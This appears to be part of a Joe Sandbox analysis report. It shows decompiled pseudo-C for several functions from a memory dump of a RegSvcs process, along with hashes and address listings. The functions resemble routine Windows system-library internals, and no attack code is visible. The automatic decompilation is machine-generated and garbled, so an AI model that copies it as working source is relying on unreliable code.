                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f129929d5f4a3b5c814d111103644fddf9671524c03ed8a565300e451964bb8
                                          • Instruction ID: c5dcc7f51e43ca05941195938809e7a494b8923886b51ffac6bee7cdaf21ba35
                                          • Opcode Fuzzy Hash: 1f129929d5f4a3b5c814d111103644fddf9671524c03ed8a565300e451964bb8
                                          • Instruction Fuzzy Hash: E731E3B66007259BCB62EF58D4817A6B7BCFB28318F044479DD44EF24AEB74DD058B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012F9100 Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E012F9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x13cf6e8);
				E0134D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E013C88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0134D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x13e86c0; // 0xe907b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x13e86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01312280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E013C88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0133AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x13eb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x13e84c0;
										if(_t69 >=  *0x13e84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E013C9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E012F922A(_t82);
							_t53 = E01317D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E013C8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x13e86c0; // 0xe907b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x13e86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x13e86bc;
										_t72 = 0x13e86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E012F9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x13e86c4;
									_t72 = 0x13e86c0;
									L18:
									E01329B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                          0x012f9100
                                          0x012f9100
                                          0x012f9100
                                          0x012f9100
                                          0x012f9102
                                          0x012f9107
                                          0x012f910c
                                          0x012f9110
                                          0x012f9115
                                          0x012f9136
                                          0x012f9143
                                          0x013537e4
                                          0x013537e4
                                          0x012f9149
                                          0x012f914e
                                          0x012f914e
                                          0x012f9117
                                          0x012f911d
                                          0x00000000
                                          0x00000000
                                          0x012f911f
                                          0x012f9125
                                          0x00000000
                                          0x012f9151
                                          0x012f9158
                                          0x012f915d
                                          0x012f9161
                                          0x012f9168
                                          0x01353715
                                          0x00000000
                                          0x012f916e
                                          0x012f916e
                                          0x012f9175
                                          0x012f9177
                                          0x012f917e
                                          0x012f917f
                                          0x012f9182
                                          0x012f9182
                                          0x012f9187
                                          0x012f9187
                                          0x012f918a
                                          0x012f918d
                                          0x012f918f
                                          0x012f9192
                                          0x012f9195
                                          0x012f9198
                                          0x012f9198
                                          0x012f9198
                                          0x012f919a
                                          0x00000000
                                          0x00000000
                                          0x0135371f
                                          0x01353721
                                          0x01353727
                                          0x0135372f
                                          0x01353733
                                          0x01353735
                                          0x01353738
                                          0x0135373b
                                          0x0135373d
                                          0x01353740
                                          0x00000000
                                          0x00000000
                                          0x01353746
                                          0x01353749
                                          0x00000000
                                          0x00000000
                                          0x0135374f
                                          0x01353751
                                          0x00000000
                                          0x00000000
                                          0x01353757
                                          0x01353759
                                          0x0135375c
                                          0x0135375c
                                          0x0135375e
                                          0x0135375e
                                          0x01353761
                                          0x01353764
                                          0x00000000
                                          0x00000000
                                          0x01353766
                                          0x01353768
                                          0x013537a3
                                          0x013537a3
                                          0x013537a5
                                          0x013537a7
                                          0x013537ad
                                          0x013537b0
                                          0x013537b2
                                          0x013537bc
                                          0x013537c2
                                          0x013537c2
                                          0x013537b2
                                          0x012f9187
                                          0x012f9187
                                          0x012f918a
                                          0x012f918d
                                          0x012f918f
                                          0x012f9192
                                          0x012f9195
                                          0x00000000
                                          0x012f9195
                                          0x00000000
                                          0x012f9187
                                          0x0135376a
                                          0x0135376a
                                          0x0135376c
                                          0x0135376c
                                          0x0135376f
                                          0x01353775
                                          0x00000000
                                          0x00000000
                                          0x01353777
                                          0x01353779
                                          0x00000000
                                          0x00000000
                                          0x01353782
                                          0x01353787
                                          0x01353789
                                          0x01353790
                                          0x01353790
                                          0x0135378b
                                          0x0135378b
                                          0x0135378b
                                          0x01353792
                                          0x01353795
                                          0x01353795
                                          0x01353798
                                          0x01353798
                                          0x0135379b
                                          0x0135379b
                                          0x012f91a3
                                          0x012f91a9
                                          0x012f91b0
                                          0x012f91b4
                                          0x012f91b4
                                          0x012f91bb
                                          0x012f91c0
                                          0x012f91c5
                                          0x012f91c7
                                          0x013537da
                                          0x012f91cd
                                          0x012f91cd
                                          0x012f91cd
                                          0x012f91d2
                                          0x012f91d5
                                          0x012f9239
                                          0x012f9239
                                          0x012f91d7
                                          0x012f91db
                                          0x012f91e1
                                          0x012f91e7
                                          0x012f91fd
                                          0x012f9203
                                          0x012f921e
                                          0x012f9223
                                          0x00000000
                                          0x012f9223
                                          0x012f9205
                                          0x012f9208
                                          0x012f920c
                                          0x012f9214
                                          0x012f9214
                                          0x012f91e9
                                          0x012f91e9
                                          0x012f91ee
                                          0x012f91f3
                                          0x012f91f3
                                          0x012f91f3
                                          0x012f91e7
                                          0x00000000
                                          0x012f91db
                                          0x012f9187
                                          0x012f9168

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e59d3e4136ebaa48a703a078245fcc1e55d365907fb6590be5001b3c554779bb
                                          • Instruction ID: 6807857e792b9e3d388b3317ec746c7c48f5140b7eebd99dd925dab2ba20aca5
                                          • Opcode Fuzzy Hash: e59d3e4136ebaa48a703a078245fcc1e55d365907fb6590be5001b3c554779bb
                                          • Instruction Fuzzy Hash: 5A319075A112469FEF25DB6CC448BAEFBF1BB4935CF1481ADE70467281C370A980CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01321DB5 Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E01321DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0131F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L01314620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0131F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                          0x01321dc2
                                          0x01321dc5
                                          0x01321dc7
                                          0x01321dcc
                                          0x01321dce
                                          0x01321dd6
                                          0x01321ddf
                                          0x01321de0
                                          0x01321de1
                                          0x01321de5
                                          0x01321de8
                                          0x01321def
                                          0x01321df0
                                          0x01321df6
                                          0x01321df7
                                          0x01321dfe
                                          0x01321e1a
                                          0x00000000
                                          0x00000000
                                          0x01321e0b
                                          0x01321e12
                                          0x01321e12
                                          0x01321e00
                                          0x01321e00
                                          0x01321e05
                                          0x01321e1e
                                          0x01321e23
                                          0x0136570f
                                          0x01365713
                                          0x00000000
                                          0x00000000
                                          0x01365719
                                          0x01365719
                                          0x01321e2c
                                          0x01321e2d
                                          0x01321e2e
                                          0x01321e2f
                                          0x01321e31
                                          0x01321e32
                                          0x01321e35
                                          0x01321e3d
                                          0x01365723
                                          0x0136573d
                                          0x0136573d
                                          0x00000000
                                          0x01365723
                                          0x01321e49
                                          0x01321e4e
                                          0x01321e4e
                                          0x01321e09
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                          • Instruction ID: 7ed430ee993ce1f275c1f43d88ef0ad5f91431b684db3fedf54086b00515da75
                                          • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                          • Instruction Fuzzy Hash: CC21A472600129FFD725DF5DCD80EABBBBDEF85698F154055EA09E7210D634AE01C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01376C0A Relevance: .1, Instructions: 79COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E01376C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E01317D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x13e7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L01314620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0133F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E01317D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E01339AE0();
						_t23 = L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                          0x01376c0a
                                          0x01376c0f
                                          0x01376c10
                                          0x01376c13
                                          0x01376c15
                                          0x01376c19
                                          0x01376c1c
                                          0x01376c21
                                          0x01376c28
                                          0x01376c3a
                                          0x01376c2a
                                          0x01376c33
                                          0x01376c33
                                          0x01376c3f
                                          0x01376c48
                                          0x01376c4d
                                          0x01376c60
                                          0x01376c65
                                          0x01376c69
                                          0x01376c73
                                          0x01376c79
                                          0x01376c7f
                                          0x01376c86
                                          0x01376c90
                                          0x01376c94
                                          0x01376ca6
                                          0x01376cb2
                                          0x01376cbd
                                          0x01376cbd
                                          0x01376cc3
                                          0x01376cc7
                                          0x01376ccb
                                          0x01376cd0
                                          0x01376cd1
                                          0x01376ce2
                                          0x01376ce2
                                          0x01376c69
                                          0x01376ced

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 000257ac12b9e65c93f9d2df7359b8b3da861e89a197ef13c45dd96e115de04c
                                          • Instruction ID: 0d67cb2145b226816a1d292b3fdb52647971d223989fbc341d04a5858eacd4f7
                                          • Opcode Fuzzy Hash: 000257ac12b9e65c93f9d2df7359b8b3da861e89a197ef13c45dd96e115de04c
                                          • Instruction Fuzzy Hash: 3A21ADB1A00A45AFDB25DB6CD880F6AB7B8FF48748F040069F904C7790D638ED10CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013390AF Relevance: .1, Instructions: 76COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E013390AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0134D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0132E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01314620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0133F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0132A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                          0x013390af
                                          0x013390b8
                                          0x013390bb
                                          0x013390bf
                                          0x013390c2
                                          0x013390c2
                                          0x013390c8
                                          0x013390cb
                                          0x013390cd
                                          0x013714d7
                                          0x013714eb
                                          0x013714eb
                                          0x00000000
                                          0x013714eb
                                          0x013714db
                                          0x013714e6
                                          0x00000000
                                          0x013714f2
                                          0x013714e8
                                          0x00000000
                                          0x013714e8
                                          0x013390d8
                                          0x013390da
                                          0x013390dd
                                          0x013390e5
                                          0x00000000
                                          0x01339139
                                          0x013390fa
                                          0x013390fe
                                          0x01339142
                                          0x00000000
                                          0x01339142
                                          0x01339104
                                          0x01339107
                                          0x0133910b
                                          0x01339110
                                          0x01339118
                                          0x01339147
                                          0x01339148
                                          0x0133914f
                                          0x01339150
                                          0x01339151
                                          0x01339152
                                          0x01339156
                                          0x0133915d
                                          0x01339160
                                          0x01339168
                                          0x0133916c
                                          0x013391bc
                                          0x013391be
                                          0x00000000
                                          0x013391be
                                          0x0133916e
                                          0x01339173
                                          0x01339176
                                          0x00000000
                                          0x00000000
                                          0x0133917c
                                          0x01339180
                                          0x013391b5
                                          0x00000000
                                          0x013391b5
                                          0x01339182
                                          0x01339185
                                          0x01339189
                                          0x00000000
                                          0x00000000
                                          0x0133918e
                                          0x01339190
                                          0x01339198
                                          0x00000000
                                          0x00000000
                                          0x013391a0
                                          0x00000000
                                          0x013391ad
                                          0x013391ad
                                          0x013391b0
                                          0x013391b1
                                          0x00000000
                                          0x01339185
                                          0x0133911a
                                          0x0133911c
                                          0x0133911f
                                          0x01339125
                                          0x01339127
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                          • Instruction ID: 7afc513a742e2e5b88fb24914180efe4dde2d298e59181dc3e0d2f27d658ec24
                                          • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                          • Instruction Fuzzy Hash: 26218671A00205EFD721DF59C444E6AF7F8EB54318F14846AE945A7210D370ED40CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01323B7A Relevance: .1, Instructions: 75COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E01323B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x13e84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x13e84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x13e84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0133AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0133FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x13e84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x13e84c4; // 0x0
					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                          0x01323b89
                                          0x01323b96
                                          0x01323ba1
                                          0x01323bab
                                          0x01323bb5
                                          0x01323bb9
                                          0x01366298
                                          0x01323bbf
                                          0x01323bc2
                                          0x01323bc3
                                          0x01323bc9
                                          0x01323bca
                                          0x01323bcc
                                          0x01323bcd
                                          0x01323bd4
                                          0x01323bd6
                                          0x01323bdb
                                          0x01323bea
                                          0x01323bf7
                                          0x01323bfb
                                          0x01323bff
                                          0x01323c09
                                          0x01323c0a
                                          0x01323c0b
                                          0x01323c0f
                                          0x01323c14
                                          0x01323c18
                                          0x01323c18
                                          0x01323bfb
                                          0x01323c1b
                                          0x01323c30
                                          0x01323c30
                                          0x01323c3d

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71a6289c59b257708a44127000c3ab76106438144a851db1fcc14cc740b5dca8
                                          • Instruction ID: 2a8b210f227ba450550272c1abf0488131e469fdc4ffa38f86c82077a4648f44
                                          • Opcode Fuzzy Hash: 71a6289c59b257708a44127000c3ab76106438144a851db1fcc14cc740b5dca8
                                          • Instruction Fuzzy Hash: 5721A472A00219AFDB15DF58CD81F5ABBBDFB44748F1500A8E504EB251D375ED01DB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01376CF0 Relevance: .1, Instructions: 74COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E01376CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E01317D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E01317D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x12d5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0132F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0132F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01377016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L01312400( &_v52);
								}
								_t21 = L01312400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                          0x01376cfb
                                          0x01376d00
                                          0x01376d02
                                          0x01376d06
                                          0x01376d0a
                                          0x01376d0e
                                          0x01376d19
                                          0x01376d2b
                                          0x01376d1b
                                          0x01376d24
                                          0x01376d24
                                          0x01376d33
                                          0x01376d39
                                          0x01376d46
                                          0x01376d4f
                                          0x01376d61
                                          0x01376d51
                                          0x01376d5a
                                          0x01376d5a
                                          0x01376d69
                                          0x01376d6b
                                          0x01376d6d
                                          0x01376d6f
                                          0x01376d6f
                                          0x01376d74
                                          0x01376d79
                                          0x01376d7a
                                          0x01376d7f
                                          0x01376d82
                                          0x01376d88
                                          0x01376d89
                                          0x01376d90
                                          0x01376d94
                                          0x01376da7
                                          0x01376db1
                                          0x01376db1
                                          0x01376dbb
                                          0x01376dbb
                                          0x01376d90
                                          0x01376d69
                                          0x01376d46
                                          0x01376dc6

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
